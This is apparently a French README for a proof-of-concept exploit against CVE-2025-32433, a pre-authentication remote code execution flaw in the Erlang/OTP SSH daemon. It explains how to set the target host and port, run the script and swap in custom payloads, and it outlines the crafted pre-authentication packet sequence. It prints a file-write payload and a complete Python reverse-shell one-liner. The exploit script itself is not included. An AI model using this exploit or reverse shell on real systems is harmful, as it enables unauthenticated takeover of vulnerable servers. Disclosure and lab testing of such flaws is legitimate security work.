
Preuve de concept pour CVE-2025-32433, une RCE pré-authentification dans le démon SSH Erlang/OTP. Comprend un script Python pour envoyer des requêtes de canal SSH conçues et exécuter des commandes arbitraires.
CVE-2025-32433 est une vulnérabilité d'exécution de code à distance (RCE) affectant le démon SSH d'Erlang/OTP.
La cause racine est une gestion incorrecte des requêtes de canal SSH pré-authentification qui peuvent être façonnées par un attaquant pour provoquer l'exécution de commandes arbitraires avant l'authentification.
Le PoC inclus démontre l'envoi de tels paquets SSH modifiés ; par défaut, il écrit /lab.txt sur la cible mais peut être adapté pour d'autres commandes.
HOST = "127.0.0.1" # Target IP
PORT = 2222 # Target SSH port
python3 cve-2025-32433.py
Par défaut, il crée /lab.txt contenant pwned.
Modifiez la charge utile dans build_channel_request pour exécuter vos propres commandes.
# Write a file file:write_file("/lab.txt", <<"pwned">>).Spawn a reverse shell
os:cmd("python3 -c 'import socket,subprocess,os; s=socket.socket(); s.connect(("127.0.0.1",2222)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); import pty; pty.spawn("sh")'")
SSH_MSG_KEXINIT modifié pour ressembler à une poignée de main normale.SSH_MSG_CHANNEL_OPEN et SSH_MSG_CHANNEL_REQUEST avec une charge utile exec avant l'authentification.Découverte et rédaction par Matt Keeley (Platform Security). Merci à lui d'avoir publié le PoC et partagé les détails.
Lien du blog : https://platformsecurity.com/blog/CVE-2025-32433-poc